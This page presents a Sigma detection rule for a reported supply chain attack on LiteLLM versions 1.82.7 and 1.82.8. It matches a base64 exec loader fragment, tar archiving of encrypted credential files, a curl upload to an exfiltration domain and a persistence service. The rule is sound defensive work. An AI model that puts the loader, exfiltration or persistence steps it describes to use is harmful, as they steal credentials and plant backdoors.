LiteLLM / TeamPCP Supply Chain Attack Indicators

calendar Apr 1, 2026 · attack.initial-access attack.t1195.002 attack.collection attack.t1560.001 attack.persistence attack.privilege-escalation attack.t1543.002 detection.emerging-threats  ·
Share on: linkedin copy

Detects process executions related to the backdoored versions of LiteLLM (v1.82.7 or v1.82.8). In March 2026, a supply chain attack was discovered involving the popular open-source LLM framework LiteLLM by Threat Actor TeamPCP. The malicious package harvests every credential on the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.

Sigma rule (View on GitHub)

 1title: LiteLLM / TeamPCP Supply Chain Attack Indicators
 2id: 36603778-030c-43c4-8cbb-cd3c1d1a80c7
 3status: experimental
 4description: |
 5    Detects process executions related to the backdoored versions of LiteLLM (v1.82.7 or v1.82.8).
 6    In March 2026, a supply chain attack was discovered involving the popular open-source LLM framework LiteLLM by Threat Actor TeamPCP.
 7    The malicious package harvests every credential on the system, encrypts and exfiltrates them, and installs a persistent C2 backdoor.    
 8references:
 9    - https://novasky.io/hunts/hunting-litellm-supply-chain
10    - https://www.virustotal.com/gui/file/71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238/
11    - https://huskyhacks.io/posts/litellm-cred-stealer/
12    - https://www.wiz.io/blog/threes-a-crowd-teampcp-trojanizes-litellm-in-continuation-of-campaign
13author: Swachchhanda Shrawan Poudel (Nextron Systems)
14date: 2026-03-30
15tags:
16    - attack.initial-access
17    - attack.t1195.002
18    - attack.collection
19    - attack.t1560.001
20    - attack.persistence
21    - attack.privilege-escalation
22    - attack.t1543.002
23    - detection.emerging-threats
24logsource:
25    category: process_creation
26    product: linux
27detection:
28    selection_pth_package:
29        # Execution of .pth file
30        Image|contains: '/python3'
31        CommandLine|contains|all:
32            - "exec(base64.b64decode('aW1wb3J0"
33            - "kI2NF9TQ1JJUFQgPSAiYV"
34    selection_tar:
35        Image|endswith: '/tar'
36        CommandLine|contains|all:
37            - 'tpcp.tar.gz'
38            - 'payload.enc'
39            - 'session.key.enc'
40    selection_curl:
41        Image|endswith: '/curl'
42        CommandLine|contains|all:
43            - 'models.litellm.cloud'
44            - 'X-Filename: tpcp.tar.gz'
45    selection_sysmon_service:
46        ParentImage|contains: '/python3'
47        CommandLine|contains|all:
48            - 'systemctl'
49            - '--user'
50            - 'sysmon'
51    condition: 1 of selection_*
52falsepositives:
53    - Unknown
54level: high

References

Related rules

to-top